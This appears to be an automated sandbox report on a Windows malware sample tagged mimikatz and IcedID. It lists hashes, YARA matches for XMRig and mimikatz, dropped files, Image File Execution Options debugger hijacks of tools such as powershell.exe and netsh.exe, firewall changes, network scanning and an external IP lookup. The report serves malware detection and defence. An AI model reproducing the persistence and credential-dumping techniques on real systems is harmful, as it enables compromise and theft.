Analysis
-
max time kernel
150s -
max time network
154s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
06-01-2025 00:23
Behavioral task
behavioral1
Sample
2025-01-06_2c2c83d3cc8dfbb72a1450753802f952_hacktools_icedid_mimikatz.exe
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
2025-01-06_2c2c83d3cc8dfbb72a1450753802f952_hacktools_icedid_mimikatz.exe
Resource
win10v2004-20241007-en
General
-
Target
2025-01-06_2c2c83d3cc8dfbb72a1450753802f952_hacktools_icedid_mimikatz.exe
-
Size
7.0MB
-
MD5
2c2c83d3cc8dfbb72a1450753802f952
-
SHA1
eb5899c48ba2fcc83059d8cfe2d74da0a61d087a
-
SHA256
38f5e7ce427bd572ac6558954b3a9058c07bf1f08854e2ef61f19ea8b08e609e
-
SHA512
64cd5c459de128e8899616cf270b35e43a398e53be2dd178e79cfd822a0b33a04681a47a1e923b8f17e628cd26cc25afe4e9cfb4ae6a90ddaf6944c509e5d0fc
-
SSDEEP
196608:5po1mknGzwHdOgEPHd9BbX/nivPlTXTYe:Ygjz0E57/iv1
Malware Config
Signatures
-
Mimikatz
mimikatz is an open source tool to dump credentials on Windows.
-
Mimikatz family
-
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
description pid Process procid_target PID 1160 created 2100 1160 byuzvnr.exe 38 -
Xmrig family
-
Contacts a large (31167) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
-
OS Credential Dumping: LSASS Memory 1 TTPs
Malicious access to Credentials History.
-
XMRig Miner payload 12 IoCs
resource yara_rule behavioral2/memory/2300-174-0x00007FF71DB00000-0x00007FF71DC20000-memory.dmp xmrig behavioral2/memory/2300-178-0x00007FF71DB00000-0x00007FF71DC20000-memory.dmp xmrig behavioral2/memory/2300-195-0x00007FF71DB00000-0x00007FF71DC20000-memory.dmp xmrig behavioral2/memory/2300-208-0x00007FF71DB00000-0x00007FF71DC20000-memory.dmp xmrig behavioral2/memory/2300-220-0x00007FF71DB00000-0x00007FF71DC20000-memory.dmp xmrig behavioral2/memory/2300-229-0x00007FF71DB00000-0x00007FF71DC20000-memory.dmp xmrig behavioral2/memory/2300-242-0x00007FF71DB00000-0x00007FF71DC20000-memory.dmp xmrig behavioral2/memory/2300-491-0x00007FF71DB00000-0x00007FF71DC20000-memory.dmp xmrig behavioral2/memory/2300-492-0x00007FF71DB00000-0x00007FF71DC20000-memory.dmp xmrig behavioral2/memory/2300-494-0x00007FF71DB00000-0x00007FF71DC20000-memory.dmp xmrig behavioral2/memory/2300-748-0x00007FF71DB00000-0x00007FF71DC20000-memory.dmp xmrig behavioral2/memory/2300-749-0x00007FF71DB00000-0x00007FF71DC20000-memory.dmp xmrig -
mimikatz is an open source tool to dump credentials on Windows 3 IoCs
resource yara_rule behavioral2/memory/4020-3-0x0000000000400000-0x0000000000A9B000-memory.dmp mimikatz behavioral2/files/0x0008000000023cbc-5.dat mimikatz behavioral2/memory/3184-134-0x00007FF6C3BF0000-0x00007FF6C3CDE000-memory.dmp mimikatz -
Drops file in Drivers directory 3 IoCs
description ioc Process File opened for modification C:\Windows\system32\drivers\etc\hosts byuzvnr.exe File created C:\Windows\system32\drivers\npf.sys wpcap.exe File created C:\Windows\system32\drivers\etc\hosts byuzvnr.exe -
Event Triggered Execution: Image File Execution Options Injection 1 TTPs 40 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\reg.exe byuzvnr.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\certutil.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" byuzvnr.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cscript.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" byuzvnr.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WmiPrvSE.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" byuzvnr.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WinSAT.exe byuzvnr.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Regsvr32.exe byuzvnr.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bitsadmin.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" byuzvnr.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mshta.exe byuzvnr.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskkill.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" byuzvnr.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\netsh.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" byuzvnr.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\powershell.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" byuzvnr.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\perfmon.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" byuzvnr.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\certutil.exe byuzvnr.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bitsadmin.exe byuzvnr.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\perfmon.exe byuzvnr.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\netsh.exe byuzvnr.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\takeown.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" byuzvnr.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rundll32.exe byuzvnr.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rundll32.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" byuzvnr.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskkill.exe byuzvnr.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\icacls.exe byuzvnr.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" byuzvnr.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mshta.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" byuzvnr.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regini.exe byuzvnr.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Regsvr32.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" byuzvnr.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WmiPrvSE.exe byuzvnr.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WinSAT.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" byuzvnr.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\icacls.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" byuzvnr.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\powershell.exe byuzvnr.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe byuzvnr.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" byuzvnr.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe byuzvnr.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\at.exe byuzvnr.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regini.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" byuzvnr.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\reg.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" byuzvnr.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\at.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" byuzvnr.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wscript.exe byuzvnr.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wscript.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" byuzvnr.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cscript.exe byuzvnr.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\takeown.exe byuzvnr.exe -
Modifies Windows Firewall 2 TTPs 2 IoCs
pid Process 2500 netsh.exe 1056 netsh.exe -
Executes dropped EXE 28 IoCs
pid Process 4956 byuzvnr.exe 1160 byuzvnr.exe 4192 wpcap.exe 1504 benegiqll.exe 3184 vfshost.exe 3692 lllgdyunt.exe 456 xohudmc.exe 3660 pujbqc.exe 2300 uieubf.exe 4856 lllgdyunt.exe 4940 lllgdyunt.exe 1676 lllgdyunt.exe 4792 lllgdyunt.exe 3848 lllgdyunt.exe 2568 lllgdyunt.exe 4188 lllgdyunt.exe 2812 lllgdyunt.exe 3184 lllgdyunt.exe 2908 lllgdyunt.exe 2436 lllgdyunt.exe 4804 lllgdyunt.exe 3004 byuzvnr.exe 2544 lllgdyunt.exe 4940 lllgdyunt.exe 2784 lllgdyunt.exe 3224 lllgdyunt.exe 5008 ruznevtjd.exe 3052 byuzvnr.exe -
Loads dropped DLL 12 IoCs
pid Process 4192 wpcap.exe 4192 wpcap.exe 4192 wpcap.exe 4192 wpcap.exe 4192 wpcap.exe 4192 wpcap.exe 4192 wpcap.exe 4192 wpcap.exe 4192 wpcap.exe 1504 benegiqll.exe 1504 benegiqll.exe 1504 benegiqll.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 69 ifconfig.me 68 ifconfig.me -
Creates a Windows Service
-
Drops file in System32 directory 18 IoCs
description ioc Process File created C:\Windows\SysWOW64\pthreadVC.dll wpcap.exe File created C:\Windows\SysWOW64\Packet.dll wpcap.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 byuzvnr.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache byuzvnr.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData byuzvnr.exe File created C:\Windows\system32\wpcap.dll wpcap.exe File created C:\Windows\SysWOW64\pujbqc.exe xohudmc.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751 byuzvnr.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content byuzvnr.exe File created C:\Windows\SysWOW64\wpcap.dll wpcap.exe File opened for modification C:\Windows\SysWOW64\pujbqc.exe xohudmc.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE byuzvnr.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft byuzvnr.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\EC98FD874C34E9667158FBB7DEFBD82F byuzvnr.exe File created C:\Windows\system32\Packet.dll wpcap.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies byuzvnr.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751 byuzvnr.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\EC98FD874C34E9667158FBB7DEFBD82F byuzvnr.exe -
resource yara_rule behavioral2/memory/3184-133-0x00007FF6C3BF0000-0x00007FF6C3CDE000-memory.dmp upx behavioral2/files/0x0007000000023d14-132.dat upx behavioral2/memory/3184-134-0x00007FF6C3BF0000-0x00007FF6C3CDE000-memory.dmp upx behavioral2/files/0x0007000000023d1f-137.dat upx behavioral2/memory/3692-138-0x00007FF6C2E50000-0x00007FF6C2EAB000-memory.dmp upx behavioral2/memory/3692-142-0x00007FF6C2E50000-0x00007FF6C2EAB000-memory.dmp upx behavioral2/files/0x0007000000023d1c-160.dat upx behavioral2/memory/2300-161-0x00007FF71DB00000-0x00007FF71DC20000-memory.dmp upx behavioral2/memory/4856-167-0x00007FF6C2E50000-0x00007FF6C2EAB000-memory.dmp upx behavioral2/memory/4940-171-0x00007FF6C2E50000-0x00007FF6C2EAB000-memory.dmp upx behavioral2/memory/2300-174-0x00007FF71DB00000-0x00007FF71DC20000-memory.dmp upx behavioral2/memory/1676-176-0x00007FF6C2E50000-0x00007FF6C2EAB000-memory.dmp upx behavioral2/memory/2300-178-0x00007FF71DB00000-0x00007FF71DC20000-memory.dmp upx behavioral2/memory/4792-181-0x00007FF6C2E50000-0x00007FF6C2EAB000-memory.dmp upx behavioral2/memory/3848-185-0x00007FF6C2E50000-0x00007FF6C2EAB000-memory.dmp upx behavioral2/memory/2568-189-0x00007FF6C2E50000-0x00007FF6C2EAB000-memory.dmp upx behavioral2/memory/4188-193-0x00007FF6C2E50000-0x00007FF6C2EAB000-memory.dmp upx behavioral2/memory/2300-195-0x00007FF71DB00000-0x00007FF71DC20000-memory.dmp upx behavioral2/memory/2812-198-0x00007FF6C2E50000-0x00007FF6C2EAB000-memory.dmp upx behavioral2/memory/3184-202-0x00007FF6C2E50000-0x00007FF6C2EAB000-memory.dmp upx behavioral2/memory/2908-206-0x00007FF6C2E50000-0x00007FF6C2EAB000-memory.dmp upx behavioral2/memory/2300-208-0x00007FF71DB00000-0x00007FF71DC20000-memory.dmp upx behavioral2/memory/2436-211-0x00007FF6C2E50000-0x00007FF6C2EAB000-memory.dmp upx behavioral2/memory/4804-215-0x00007FF6C2E50000-0x00007FF6C2EAB000-memory.dmp upx behavioral2/memory/2300-220-0x00007FF71DB00000-0x00007FF71DC20000-memory.dmp upx behavioral2/memory/2544-223-0x00007FF6C2E50000-0x00007FF6C2EAB000-memory.dmp upx behavioral2/memory/4940-226-0x00007FF6C2E50000-0x00007FF6C2EAB000-memory.dmp upx behavioral2/memory/2784-228-0x00007FF6C2E50000-0x00007FF6C2EAB000-memory.dmp upx behavioral2/memory/2300-229-0x00007FF71DB00000-0x00007FF71DC20000-memory.dmp upx behavioral2/memory/3224-231-0x00007FF6C2E50000-0x00007FF6C2EAB000-memory.dmp upx behavioral2/memory/2300-242-0x00007FF71DB00000-0x00007FF71DC20000-memory.dmp upx behavioral2/memory/2300-491-0x00007FF71DB00000-0x00007FF71DC20000-memory.dmp upx behavioral2/memory/2300-492-0x00007FF71DB00000-0x00007FF71DC20000-memory.dmp upx behavioral2/memory/2300-494-0x00007FF71DB00000-0x00007FF71DC20000-memory.dmp upx behavioral2/memory/2300-748-0x00007FF71DB00000-0x00007FF71DC20000-memory.dmp upx behavioral2/memory/2300-749-0x00007FF71DB00000-0x00007FF71DC20000-memory.dmp upx -
Drops file in Program Files directory 3 IoCs
description ioc Process File created C:\Program Files\WinPcap\rpcapd.exe wpcap.exe File created C:\Program Files\WinPcap\LICENSE wpcap.exe File created C:\Program Files\WinPcap\uninstall.exe wpcap.exe -
Drops file in Windows directory 60 IoCs
description ioc Process File created C:\Windows\hgpuenbvt\lzvztyutv\wpcap.dll byuzvnr.exe File created C:\Windows\hgpuenbvt\UnattendGC\specials\svschost.xml byuzvnr.exe File opened for modification C:\Windows\klhnlzly\docmicfg.xml byuzvnr.exe File created C:\Windows\hgpuenbvt\UnattendGC\vimpcsvc.xml byuzvnr.exe File created C:\Windows\hgpuenbvt\UnattendGC\specials\vimpcsvc.xml byuzvnr.exe File created C:\Windows\hgpuenbvt\Corporate\vfshost.exe byuzvnr.exe File created C:\Windows\hgpuenbvt\UnattendGC\specials\schoedcl.xml byuzvnr.exe File created C:\Windows\klhnlzly\schoedcl.xml byuzvnr.exe File created C:\Windows\hgpuenbvt\UnattendGC\specials\docmicfg.exe byuzvnr.exe File created C:\Windows\hgpuenbvt\UnattendGC\svschost.xml byuzvnr.exe File created C:\Windows\hgpuenbvt\UnattendGC\spoolsrv.xml byuzvnr.exe File created C:\Windows\hgpuenbvt\UnattendGC\AppCapture32.dll byuzvnr.exe File created C:\Windows\hgpuenbvt\UnattendGC\specials\libeay32.dll byuzvnr.exe File created C:\Windows\hgpuenbvt\UnattendGC\specials\tibe-2.dll byuzvnr.exe File created C:\Windows\klhnlzly\svschost.xml byuzvnr.exe File created C:\Windows\hgpuenbvt\UnattendGC\specials\xdvl-0.dll byuzvnr.exe File created C:\Windows\hgpuenbvt\lzvztyutv\benegiqll.exe byuzvnr.exe File created C:\Windows\hgpuenbvt\UnattendGC\specials\trch-1.dll byuzvnr.exe File opened for modification C:\Windows\klhnlzly\spoolsrv.xml byuzvnr.exe File created C:\Windows\hgpuenbvt\UnattendGC\AppCapture64.dll byuzvnr.exe File created C:\Windows\klhnlzly\byuzvnr.exe 2025-01-06_2c2c83d3cc8dfbb72a1450753802f952_hacktools_icedid_mimikatz.exe File created C:\Windows\hgpuenbvt\lzvztyutv\wpcap.exe byuzvnr.exe File created C:\Windows\hgpuenbvt\UnattendGC\specials\ucl.dll byuzvnr.exe File created C:\Windows\hgpuenbvt\UnattendGC\specials\spoolsrv.xml byuzvnr.exe File created C:\Windows\hgpuenbvt\lzvztyutv\ip.txt byuzvnr.exe File created C:\Windows\hgpuenbvt\UnattendGC\specials\posh-0.dll byuzvnr.exe File created C:\Windows\hgpuenbvt\UnattendGC\specials\tucl-1.dll byuzvnr.exe File created C:\Windows\hgpuenbvt\UnattendGC\docmicfg.xml byuzvnr.exe File created C:\Windows\hgpuenbvt\upbdrjv\swrpwe.exe byuzvnr.exe File created C:\Windows\hgpuenbvt\UnattendGC\specials\coli-0.dll byuzvnr.exe File created C:\Windows\hgpuenbvt\UnattendGC\specials\spoolsrv.exe byuzvnr.exe File created C:\Windows\hgpuenbvt\UnattendGC\schoedcl.xml byuzvnr.exe File created C:\Windows\hgpuenbvt\UnattendGC\specials\cnli-1.dll byuzvnr.exe File created C:\Windows\klhnlzly\docmicfg.xml byuzvnr.exe File created C:\Windows\hgpuenbvt\UnattendGC\specials\vimpcsvc.exe byuzvnr.exe File created C:\Windows\hgpuenbvt\UnattendGC\specials\svschost.exe byuzvnr.exe File created C:\Windows\hgpuenbvt\Corporate\mimidrv.sys byuzvnr.exe File opened for modification C:\Windows\klhnlzly\byuzvnr.exe 2025-01-06_2c2c83d3cc8dfbb72a1450753802f952_hacktools_icedid_mimikatz.exe File created C:\Windows\hgpuenbvt\lzvztyutv\ruznevtjd.exe byuzvnr.exe File created C:\Windows\hgpuenbvt\UnattendGC\specials\trfo-2.dll byuzvnr.exe File created C:\Windows\hgpuenbvt\UnattendGC\specials\crli-0.dll byuzvnr.exe File created C:\Windows\hgpuenbvt\lzvztyutv\scan.bat byuzvnr.exe File created C:\Windows\klhnlzly\spoolsrv.xml byuzvnr.exe File created C:\Windows\klhnlzly\vimpcsvc.xml byuzvnr.exe File created C:\Windows\hgpuenbvt\UnattendGC\Shellcode.ini byuzvnr.exe File created C:\Windows\ime\byuzvnr.exe byuzvnr.exe File opened for modification C:\Windows\hgpuenbvt\lzvztyutv\Result.txt ruznevtjd.exe File created C:\Windows\hgpuenbvt\lzvztyutv\Packet.dll byuzvnr.exe File opened for modification C:\Windows\hgpuenbvt\lzvztyutv\Packet.dll byuzvnr.exe File created C:\Windows\hgpuenbvt\UnattendGC\specials\docmicfg.xml byuzvnr.exe File created C:\Windows\hgpuenbvt\UnattendGC\specials\zlib1.dll byuzvnr.exe File opened for modification C:\Windows\klhnlzly\vimpcsvc.xml byuzvnr.exe File opened for modification C:\Windows\hgpuenbvt\Corporate\log.txt cmd.exe File created C:\Windows\hgpuenbvt\UnattendGC\specials\schoedcl.exe byuzvnr.exe File opened for modification C:\Windows\klhnlzly\svschost.xml byuzvnr.exe File opened for modification C:\Windows\klhnlzly\schoedcl.xml byuzvnr.exe File created C:\Windows\hgpuenbvt\Corporate\mimilib.dll byuzvnr.exe File created C:\Windows\hgpuenbvt\UnattendGC\specials\exma-1.dll byuzvnr.exe File created C:\Windows\hgpuenbvt\UnattendGC\specials\libxml2.dll byuzvnr.exe File created C:\Windows\hgpuenbvt\UnattendGC\specials\ssleay32.dll byuzvnr.exe -
Launches sc.exe 4 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 516 sc.exe 5076 sc.exe 3100 sc.exe 2416 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 51 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
description ioc Process Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe -
System Location Discovery: System Language Discovery 1 TTPs 64 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language byuzvnr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wpcap.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language PING.EXE Key opened 